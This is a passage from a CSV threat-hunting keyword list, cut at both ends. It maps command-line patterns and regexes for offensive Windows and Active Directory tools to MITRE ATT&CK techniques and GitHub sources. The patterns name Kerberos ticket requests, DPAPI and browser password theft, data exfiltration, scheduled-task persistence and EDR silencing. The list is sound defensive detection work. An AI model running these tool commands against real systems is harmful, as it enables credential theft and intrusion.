operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","4341" "*.exe /method:delete /taskname:* /technique:hide*",".{0,1000}\.exe\s\/method\:delete\s\/taskname\:.{0,1000}\s\/technique\:hide.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","4342" "*.exe /method:edit /taskname:Cleanup*",".{0,1000}\.exe\s\/method\:edit\s\/taskname\:Cleanup.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - 
T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","4343" "*.exe 3 cmd*",".{0,1000}\.exe\s3\scmd.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","4349" "*.exe acl -dn * -scope * -trustee *",".{0,1000}\.exe\sacl\s\-dn\s.{0,1000}\s\-scope\s.{0,1000}\s\-trustee\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4350" "*.exe --ACLScan * --OU *",".{0,1000}\.exe\s\-\-ACLScan\s.{0,1000}\s\-\-OU\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","4351" "*.exe --Action GetGPLink --*",".{0,1000}\.exe\s\-\-Action\sGetGPLink\s\-\-.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4352" "*.exe --Action GetGPLink --*",".{0,1000}\.exe\s\-\-Action\sGetGPLink\s\-\-.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4353" "*.exe --Action GetGPO --*",".{0,1000}\.exe\s\-\-Action\sGetGPO\s\-\-.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4354" "*.exe --Action GetGPO --*",".{0,1000}\.exe\s\-\-Action\sGetGPO\s\-\-.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4355" "*.exe --Action MoveObject --*",".{0,1000}\.exe\s\-\-Action\sMoveObject\s\-\-.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4356" "*.exe --Action MoveObject --*",".{0,1000}\.exe\s\-\-Action\sMoveObject\s\-\-.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4357" "*.exe --Action NewGPLink --DN *",".{0,1000}\.exe\s\-\-Action\sNewGPLink\s\-\-DN\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4358" "*.exe --Action NewGPLink --DN *",".{0,1000}\.exe\s\-\-Action\sNewGPLink\s\-\-DN\s.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4359" "*.exe --Action RemoveGPLink --DN *",".{0,1000}\.exe\s\-\-Action\sRemoveGPLink\s\-\-DN\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4360" "*.exe --Action RemoveGPLink --DN *",".{0,1000}\.exe\s\-\-Action\sRemoveGPLink\s\-\-DN\s.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4361" "*.exe --Action RemoveGPO --*",".{0,1000}\.exe\s\-\-Action\sRemoveGPO\s\-\-.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4362" "*.exe --Action RemoveGPO --*",".{0,1000}\.exe\s\-\-Action\sRemoveGPO\s\-\-.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4363" "*.exe --Action RemoveOU --*",".{0,1000}\.exe\s\-\-Action\sRemoveOU\s\-\-.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4364" "*.exe --Action RemoveOU --*",".{0,1000}\.exe\s\-\-Action\sRemoveOU\s\-\-.{0,1000}","offensive_tool_keyword","SharpGpo","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpGpo","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4365" "*.exe action=create * service=* displayname=* binpath=**",".{0,1000}\.exe\saction\=create\s.{0,1000}\sservice\=.{0,1000}\sdisplayname\=.{0,1000}\sbinpath\=.{0,1000}.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. 
(included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","N/A","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","4366" "*.exe action=dcom computername=* command=* throw=wmi *",".{0,1000}\.exe\saction\=dcom\scomputername\=.{0,1000}\scommand\=.{0,1000}\sthrow\=wmi\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4367" "*.exe action=dcom computername=* command=* throw=wmi *",".{0,1000}\.exe\saction\=dcom\scomputername\=.{0,1000}\scommand\=.{0,1000}\sthrow\=wmi\s.{0,1000}","offensive_tool_keyword","SharpMove","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4368" "*.exe action=executevbs computername=*",".{0,1000}\.exe\saction\=executevbs\scomputername\=.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 
- T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","4369" "*.exe action=GetScheduledTaskCOMHandler*",".{0,1000}\.exe\saction\=GetScheduledTaskCOMHandler.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","4370" "*.exe action=ListRunningServices*",".{0,1000}\.exe\saction\=ListRunningServices.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","4371" "*.exe action=ListScheduledTasks*",".{0,1000}\.exe\saction\=ListScheduledTasks.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","4372" "*.exe action=ListTaskNames*",".{0,1000}\.exe\saction\=ListTaskNames.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","4373" "*.exe --adcs * --remote *",".{0,1000}\.exe\s\-\-adcs\s.{0,1000}\s\-\-remote\s.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts 
and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","4374" "*.exe AlwaysInstallElevated*",".{0,1000}\.exe\sAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4375" "*.exe app /create /name:* /uncpath:*\\*",".{0,1000}\.exe\sapp\s\/create\s\/name\:.{0,1000}\s\/uncpath\:.{0,1000}\\\\.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","0","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","4376" "*.exe app /deploy /name:* /groupname:* /assignmentname:*",".{0,1000}\.exe\sapp\s\/deploy\s\/name\:.{0,1000}\s\/groupname\:.{0,1000}\s\/assignmentname\:.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","0","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","4377" "*.exe asktgs /ticket:B64_TGT /service:*",".{0,1000}\.exe\sasktgs\s\/ticket\:B64_TGT\s\/service\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / 
Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","4378" "*.exe asktgs*",".{0,1000}\.exe\sasktgs.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","4379" "*.exe asktgt /user:* /aes256:* /opsec /ptt*",".{0,1000}\.exe\sasktgt\s\/user\:.{0,1000}\s\/aes256\:.{0,1000}\s\/opsec\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus More stealthy variant but requires the AES256 key (see 'Dumping OS credentials with Mimikatz' section)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4380" "*.exe asktgt /user:* /certificate:* /password:*",".{0,1000}\.exe\sasktgt\s\/user\:.{0,1000}\s\/certificate\:.{0,1000}\s\/password\:.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","4381" "*.exe asktgt /user:* /rc4:* /createnetonly:*cmd.exe*",".{0,1000}\.exe\sasktgt\s\/user\:.{0,1000}\s\/rc4\:.{0,1000}\s\/createnetonly\:.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Pass the ticket to a sacrificial hidden 
process. allowing you to e.g. steal the token from this process (requires elevation)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4382" "*.exe asktgt /user:* /rc4:* /ptt*",".{0,1000}\.exe\sasktgt\s\/user\:.{0,1000}\s\/rc4\:.{0,1000}\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Request a TGT as the target user and pass it into the current session","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4383" "*.exe --asrep",".{0,1000}\.exe\s\-\-asrep","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","4384" "*.exe asreproast /*",".{0,1000}\.exe\sasreproast\s\/.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","4385" "*.exe audit HijackablePaths*",".{0,1000}\.exe\saudit\sHijackablePaths.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - 
T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4386" "*.exe audit HijackablePaths*",".{0,1000}\.exe\saudit\sHijackablePaths.{0,1000}","offensive_tool_keyword","SharpUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4387" "*.exe audit ModifiableServices*",".{0,1000}\.exe\saudit\sModifiableServices.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4388" "*.exe AzureStorage --connectionstring * --filepath * --extensions *",".{0,1000}\.exe\sAzureStorage\s\-\-connectionstring\s.{0,1000}\s\-\-filepath\s.{0,1000}\s\-\-extensions\s.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","4389" "*.exe -b * -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'*",".{0,1000}\.exe\s\-b\s.{0,1000}\s\-p\s\'C\:\\Users\\User\\AppData\\Local\\Microsoft\\Edge\\User\sData\\Default\'.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tool","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","4390" "*.exe -b all -f json --dir results -cc*",".{0,1000}\.exe\s\-b\sall\s\-f\sjson\s\-\-dir\sresults\s\-cc.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tool","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","4391" "*.exe -b chromium -p 
*\AppData\Local\Google\Chrome\*",".{0,1000}\.exe\s\-b\schromium\s\-p\s.{0,1000}\\AppData\\Local\\Google\\Chrome\\.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","4392" "*.exe backupkey /nowrap *.pvk*",".{0,1000}\.exe\sbackupkey\s\/nowrap\s.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4393" "*.exe backupkey /server:*",".{0,1000}\.exe\sbackupkey\s\/server\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4394" "*.exe blob /target:C:\Temp\*",".{0,1000}\.exe\sblob\s\/target\:C\:\\Temp\\.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4395" "*.exe blockedr*",".{0,1000}\.exe\sblockedr.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the 
server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","4396" "*.exe BOOKMARKS*",".{0,1000}\.exe\sBOOKMARKS.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","4397" "*.exe c:\*.sys 3 clear*",".{0,1000}\.exe\sc\:\\.{0,1000}\.sys\s3\sclear.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","4398" "*.exe CachedGPPPassword*",".{0,1000}\.exe\sCachedGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
